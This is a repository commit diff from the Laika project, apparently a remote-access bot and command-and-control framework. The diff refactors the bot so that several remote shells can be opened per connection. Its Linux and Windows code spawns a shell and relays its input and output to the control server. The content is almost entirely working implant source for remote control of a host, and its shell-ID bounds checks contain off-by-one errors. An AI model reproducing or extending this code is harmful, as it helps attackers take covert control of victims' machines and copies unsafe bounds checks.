CPunch/Laika
1
0
Fork 0
mirror of https://github.com/CPunch/Laika.git synced 2025-09-29 21:20:11 +00:00
Code Issues Projects Releases Wiki Activity

Major shell packet refactoring

Browse Source 
- can now open multiple shells per peer (change LAIKA_MAX_SHELLS)
- more sanity checking for public keys (new peers with duplicate keys are killed
- misc. refactoring, added cnc/cpeer.[ch]
This commit is contained in:
CPunch
2022-05-07 20:09:42 -05:00
parent 67f404dac6
commit 7d96f3252c
15 changed files with 455 additions and 264 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
bot/include/bot.h
View File

@@ -12,11 +12,12 @@
struct sLaika_shell;
struct sLaika_bot {
uint8_t priv[crypto_kx_SECRETKEYBYTES], pub[crypto_kx_PUBLICKEYBYTES];
struct sLaika_shell *shells[LAIKA_MAX_SHELLS];
struct sLaika_pollList pList;
struct sLaika_taskService tService;
struct sLaika_peer *peer;
struct sLaika_shell *shell;
struct sLaika_task *shellTask;
int activeShells;
};
struct sLaika_bot *laikaB_newBot(void);

9
bot/include/shell.h
View File

@@ -8,9 +8,16 @@
struct sLaika_bot;
struct sLaika_shell;
struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows);
struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows, uint32_t id);
void laikaB_freeShell(struct sLaika_bot *bot, struct sLaika_shell *shell);
/* raw platform-dependent shell allocation */
struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int rows, uint32_t id);
void laikaB_freeRAWShell(struct sLaika_bot *bot, struct sLaika_shell *shell);
/* has to be a function since the struct is different depending on the platform */
uint32_t laikaB_getShellID(struct sLaika_bot *bot, struct sLaika_shell *shell);
/* handles reading & writing to shell pipes */
bool laikaB_readShell(struct sLaika_bot *bot, struct sLaika_shell *shell);
bool laikaB_writeShell(struct sLaika_bot *bot, struct sLaika_shell *shell, char *buf, size_t length);

28
bot/lin/linshell.c
View File

@@ -16,15 +16,17 @@
struct sLaika_shell {
int pid;
int fd;
uint32_t id;
};
struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows) {
struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int rows, uint32_t id) {
struct winsize ws;
struct sLaika_shell *shell = (struct sLaika_shell*)laikaM_malloc(sizeof(struct sLaika_shell));
ws.ws_col = cols;
ws.ws_row = rows;
shell->pid = forkpty(&shell->fd, NULL, NULL, &ws);
shell->id = id;
if (shell->pid == 0) {
/* child process, clone & run shell */
@@ -38,38 +40,34 @@ struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows)
LAIKA_ERROR("Failed to set shell fd O_NONBLOCK");
}
/* start shell task */
bot->shellTask = laikaT_newTask(&bot->tService, LAIKA_SHELL_TASK_DELTA, laikaB_shellTask, (void*)bot);
return shell;
}
void laikaB_freeShell(struct sLaika_bot *bot, struct sLaika_shell *shell) {
void laikaB_freeRAWShell(struct sLaika_bot *bot, struct sLaika_shell *shell) {
/* kill the shell */
kill(shell->pid, SIGTERM);
close(shell->fd);
/* tell cnc shell is closed */
laikaS_emptyOutPacket(bot->peer, LAIKAPKT_SHELL_CLOSE);
bot->shell = NULL;
laikaM_free(shell);
/* stop shell task */
laikaT_delTask(&bot->tService, bot->shellTask);
bot->shellTask = NULL;
}
uint32_t laikaB_getShellID(struct sLaika_bot *bot, struct sLaika_shell *shell) {
return shell->id;
}
/* ============================================[[ Shell Handlers ]]============================================= */
bool laikaB_readShell(struct sLaika_bot *bot, struct sLaika_shell *shell) {
char readBuf[LAIKA_SHELL_DATA_MAX_LENGTH];
char readBuf[LAIKA_SHELL_DATA_MAX_LENGTH-sizeof(uint32_t)];
struct sLaika_peer *peer = bot->peer;
struct sLaika_socket *sock = &peer->sock;
int rd = read(shell->fd, readBuf, LAIKA_SHELL_DATA_MAX_LENGTH);
int rd = read(shell->fd, readBuf, LAIKA_SHELL_DATA_MAX_LENGTH-sizeof(uint32_t));
if (rd > 0) {
/* we read some input! send to cnc */
laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
laikaS_writeInt(sock, &shell->id, sizeof(uint32_t));
laikaS_write(sock, readBuf, rd);
laikaS_endVarPacket(peer);
} else if (rd == -1) {

19
bot/src/bot.c
View File

@@ -30,11 +30,11 @@ struct sLaika_peerPacketInfo laikaB_pktTbl[LAIKAPKT_MAXNONE] = {
false),
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_OPEN,
laikaB_handleShellOpen,
sizeof(uint16_t) + sizeof(uint16_t),
sizeof(uint32_t) + sizeof(uint16_t) + sizeof(uint16_t),
false),
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_CLOSE,
laikaB_handleShellClose,
0,
sizeof(uint32_t),
false),
LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_DATA,
laikaB_handleShellData,
@@ -57,6 +57,7 @@ struct sLaika_bot *laikaB_newBot(void) {
struct hostent *host;
char *tempINBuf;
size_t _unused;
int i;
laikaP_initPList(&bot->pList);
bot->peer = laikaS_newPeer(
@@ -70,8 +71,12 @@ struct sLaika_bot *laikaB_newBot(void) {
laikaT_initTaskService(&bot->tService);
laikaT_newTask(&bot->tService, 5000, laikaB_pingTask, (void*)bot);
bot->shell = NULL;
/* init shells */
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
bot->shells[i] = NULL;
}
bot->shellTask = NULL;
bot->activeShells = 0;
/* generate keypair */
if (sodium_init() < 0) {
@@ -114,9 +119,11 @@ struct sLaika_bot *laikaB_newBot(void) {
void laikaB_freeBot(struct sLaika_bot *bot) {
int i;
/* clear shell */
if (bot->shell)
laikaB_freeShell(bot, bot->shell);
/* clear shells */
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
if (bot->shells[i])
laikaB_freeShell(bot, bot->shells[i]);
}
laikaP_cleanPList(&bot->pList);
laikaS_freePeer(bot->peer);

79
bot/src/shell.c
View File

@@ -7,53 +7,100 @@
#include "bot.h"
#include "shell.h"
struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows, uint32_t id) {
if (bot->activeShells++ > LAIKA_MAX_SHELLS)
LAIKA_ERROR("Failed to allocate new shell, max shells reached!\n");
/* start shell task */
if (!bot->shellTask)
bot->shellTask = laikaT_newTask(&bot->tService, LAIKA_SHELL_TASK_DELTA, laikaB_shellTask, (void*)bot);
return bot->shells[id] = laikaB_newRAWShell(bot, cols, rows, id);
}
void laikaB_freeShell(struct sLaika_bot *bot, struct sLaika_shell *shell) {
uint32_t id = laikaB_getShellID(bot, shell);
/* tell cnc shell is closed */
laikaS_startOutPacket(bot->peer, LAIKAPKT_SHELL_CLOSE);
laikaS_writeInt(&bot->peer->sock, &id, sizeof(uint32_t));
laikaS_endOutPacket(bot->peer);
laikaB_freeRAWShell(bot, shell);
bot->shells[id] = NULL;
if (--bot->activeShells == 0) {
/* stop shell task */
laikaT_delTask(&bot->tService, bot->shellTask);
bot->shellTask = NULL;
}
}
/* ============================================[[ Packet Handlers ]]============================================= */
void laikaB_handleShellOpen(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
struct sLaika_bot *bot = (struct sLaika_bot*)uData;
struct sLaika_shell *shell;
uint32_t id;
uint16_t cols, rows;
/* check if shell is already open */
if (bot->shell)
LAIKA_ERROR("LAIKAPKT_SHELL_OPEN requested on already open shell!\n");
laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
laikaS_readInt(&peer->sock, &cols, sizeof(uint16_t));
laikaS_readInt(&peer->sock, &rows, sizeof(uint16_t));
/* check if shell is already open */
if (id > LAIKA_MAX_SHELLS || (shell = bot->shells[id]))
LAIKA_ERROR("LAIKAPKT_SHELL_OPEN requested on already open shell!\n");
/* open shell & if we failed, tell cnc */
if ((bot->shell = laikaB_newShell(bot, cols, rows)) == NULL)
laikaS_emptyOutPacket(peer, LAIKAPKT_SHELL_CLOSE);
if ((shell = laikaB_newShell(bot, cols, rows, id)) == NULL) {
laikaS_startOutPacket(bot->peer, LAIKAPKT_SHELL_CLOSE);
laikaS_writeInt(&bot->peer->sock, &id, sizeof(uint32_t));
laikaS_endOutPacket(bot->peer);
}
}
void laikaB_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
struct sLaika_bot *bot = (struct sLaika_bot*)uData;
struct sLaika_shell *shell;
uint32_t id;
laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
/* check if shell is not running */
if (bot->shell == NULL)
if (id > LAIKA_MAX_SHELLS || !(shell = bot->shells[id]))
LAIKA_ERROR("LAIKAPKT_SHELL_CLOSE requested on unopened shell!\n");
/* close shell */
laikaB_freeShell(bot, bot->shell);
laikaB_freeShell(bot, shell);
}
void laikaB_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
char buf[LAIKA_SHELL_DATA_MAX_LENGTH];
struct sLaika_bot *bot = (struct sLaika_bot*)uData;
struct sLaika_shell *shell = bot->shell;
/* sanity check shell */
if (bot->shell == NULL)
LAIKA_ERROR("LAIKAPKT_SHELL_DATA requested on unopened shell!\n");
struct sLaika_shell *shell;
uint32_t id;
/* read data buf */
laikaS_read(&peer->sock, buf, sz);
laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
laikaS_read(&peer->sock, buf, sz-sizeof(uint32_t));
/* sanity check shell */
if (id > LAIKA_MAX_SHELLS || !(shell = bot->shells[id]))
LAIKA_ERROR("LAIKAPKT_SHELL_DATA requested on unopened shell!\n");
/* write to shell */
laikaB_writeShell(bot, shell, buf, sz);
laikaB_writeShell(bot, shell, buf, sz-sizeof(uint32_t));
}
void laikaB_shellTask(struct sLaika_taskService *service, struct sLaika_task *task, clock_t currTick, void *uData) {
struct sLaika_bot *bot = (struct sLaika_bot*)uData;
struct sLaika_shell *shell;
int i;
laikaB_readShell(bot, bot->shell);
for (i = 0; i < LAIKA_MAX_SHELLS; i++) {
if ((shell = bot->shells[i]))
laikaB_readShell(bot, shell);
}
}

178
bot/win/winshell.c
View File

@@ -13,8 +13,94 @@ struct sLaika_shell {
PROCESS_INFORMATION procInfo;
STARTUPINFOEX startupInfo;
HPCON pseudoCon;
uint32_t id;
};
HRESULT CreatePseudoConsoleAndPipes(HPCON *phPC, HANDLE *phPipeIn, HANDLE *phPipeOut, int cols, int rows);
HRESULT InitializeStartupInfoAttachedToPseudoConsole(STARTUPINFOEX *pStartupInfo, HPCON hPC);
struct sLaika_shell *laikaB_newRAWShell(struct sLaika_bot *bot, int cols, int rows, uint32_t id) {;
TCHAR szComspec[MAX_PATH];
struct sLaika_shell* shell = (struct sLaika_shell*)laikaM_malloc(sizeof(struct sLaika_shell));
HRESULT hr;
ZeroMemory(shell, sizeof(struct sLaika_shell));
shell->id = id;
/* create pty */
hr = CreatePseudoConsoleAndPipes(&shell->pseudoCon, &shell->in, &shell->out, cols, rows);
if (hr != S_OK) {
laikaM_free(shell);
return NULL;
}
/* get user's shell path */
if (GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) == 0) {
laikaM_free(shell);
return NULL;
}
/* create process */
hr = InitializeStartupInfoAttachedToPseudoConsole(&shell->startupInfo, shell->pseudoCon);
if (hr != S_OK) {
ClosePseudoConsole(shell->pseudoCon);
laikaM_free(shell);
return NULL;
}
/* launch cmd shell */
hr = CreateProcess(
NULL, /* No module name - use Command Line */
szComspec, /* Command Line */
NULL, /* Process handle not inheritable */
NULL, /* Thread handle not inheritable */
FALSE, /* Inherit handles */
EXTENDED_STARTUPINFO_PRESENT, /* Creation flags */
NULL, /* Use parent's environment block */
NULL, /* Use parent's starting directory */
&shell->startupInfo.StartupInfo,/* Pointer to STARTUPINFO */
&shell->procInfo) /* Pointer to PROCESS_INFORMATION */
? S_OK : HRESULT_FROM_WIN32(GetLastError());
if (hr != S_OK) {
DeleteProcThreadAttributeList(shell->startupInfo.lpAttributeList);
laikaM_free(shell->startupInfo.lpAttributeList);
ClosePseudoConsole(shell->pseudoCon);
laikaM_free(shell);
return NULL;
}
return shell;
}
void laikaB_freeRAWShell(struct sLaika_bot *bot, struct sLaika_shell *shell) {
/* kill process (it's ok if it fails) */
TerminateProcess(shell->procInfo.hProcess, 0);
/* cleanup process - info & thread */
CloseHandle(shell->procInfo.hThread);
CloseHandle(shell->procInfo.hProcess);
/* Cleanup attribute list */
DeleteProcThreadAttributeList(shell->startupInfo.lpAttributeList);
laikaM_free(shell->startupInfo.lpAttributeList);
/* close pseudo console */
ClosePseudoConsole(shell->pseudoCon);
/* free shell struct */
laikaM_free(shell);
}
uint32_t laikaB_getShellID(struct sLaika_bot *bot, struct sLaika_shell *shell) {
return shell->id;
}
/* ============================================[[ Shell Handlers ]]============================================= */
/* edited from https://github.com/microsoft/terminal/blob/main/samples/ConPTY/EchoCon/EchoCon/EchoCon.cpp */
HRESULT CreatePseudoConsoleAndPipes(HPCON *phPC, HANDLE *phPipeIn, HANDLE *phPipeOut, int cols, int rows) {
COORD consoleSize = (COORD){.X = cols, .Y = rows};
@@ -77,103 +163,17 @@ HRESULT InitializeStartupInfoAttachedToPseudoConsole(STARTUPINFOEX *pStartupInfo
return hr;
}
struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows) {;
TCHAR szComspec[MAX_PATH];
struct sLaika_shell* shell = (struct sLaika_shell*)laikaM_malloc(sizeof(struct sLaika_shell));
HRESULT hr;
ZeroMemory(shell, sizeof(struct sLaika_shell));
/* create pty */
hr = CreatePseudoConsoleAndPipes(&shell->pseudoCon, &shell->in, &shell->out, cols, rows);
if (hr != S_OK) {
laikaM_free(shell);
return NULL;
}
/* get user's shell path */
if (GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) == 0) {
laikaM_free(shell);
return NULL;
}
/* create process */
hr = InitializeStartupInfoAttachedToPseudoConsole(&shell->startupInfo, shell->pseudoCon);
if (hr != S_OK) {
ClosePseudoConsole(shell->pseudoCon);
laikaM_free(shell);
return NULL;
}
/* launch cmd shell */
hr = CreateProcess(
NULL, /* No module name - use Command Line */
szComspec, /* Command Line */
NULL, /* Process handle not inheritable */
NULL, /* Thread handle not inheritable */
FALSE, /* Inherit handles */
EXTENDED_STARTUPINFO_PRESENT, /* Creation flags */
NULL, /* Use parent's environment block */
NULL, /* Use parent's starting directory */
&shell->startupInfo.StartupInfo,/* Pointer to STARTUPINFO */
&shell->procInfo) /* Pointer to PROCESS_INFORMATION */
? S_OK : HRESULT_FROM_WIN32(GetLastError());
if (hr != S_OK) {
DeleteProcThreadAttributeList(shell->startupInfo.lpAttributeList);
laikaM_free(shell->startupInfo.lpAttributeList);
ClosePseudoConsole(shell->pseudoCon);
laikaM_free(shell);
return NULL;
}
/* start shell task */
bot->shellTask = laikaT_newTask(&bot->tService, LAIKA_SHELL_TASK_DELTA, laikaB_shellTask, (void*)bot);
return shell;
}
void laikaB_freeShell(struct sLaika_bot *bot, struct sLaika_shell *shell) {
/* kill process (it's ok if it fails) */
TerminateProcess(shell->procInfo.hProcess, 0);
/* cleanup process - info & thread */
CloseHandle(shell->procInfo.hThread);
CloseHandle(shell->procInfo.hProcess);
/* Cleanup attribute list */
DeleteProcThreadAttributeList(shell->startupInfo.lpAttributeList);
laikaM_free(shell->startupInfo.lpAttributeList);
/* close pseudo console */
ClosePseudoConsole(shell->pseudoCon);
/* tell cnc shell is closed */
laikaS_emptyOutPacket(bot->peer, LAIKAPKT_SHELL_CLOSE);
/* free shell struct */
laikaM_free(shell);
bot->shell = NULL;
/* stop shell task */
laikaT_delTask(&bot->tService, bot->shellTask);
bot->shellTask = NULL;
}
bool laikaB_readShell(struct sLaika_bot *bot, struct sLaika_shell *shell) {
char readBuf[LAIKA_SHELL_DATA_MAX_LENGTH];
char readBuf[LAIKA_SHELL_DATA_MAX_LENGTH-sizeof(uint32_t)];
struct sLaika_peer* peer = bot->peer;
struct sLaika_socket* sock = &peer->sock;
DWORD rd;
bool readSucc = ReadFile(shell->in, readBuf, LAIKA_SHELL_DATA_MAX_LENGTH, &rd, NULL);
bool readSucc = ReadFile(shell->in, readBuf, LAIKA_SHELL_DATA_MAX_LENGTH-sizeof(uint32_t), &rd, NULL);
if (readSucc) {
/* we read some input! send to cnc */
laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
laikaS_writeInt(sock, &shell->id, sizeof(uint32_t));
laikaS_write(sock, readBuf, rd);
laikaS_endVarPacket(peer);
} else {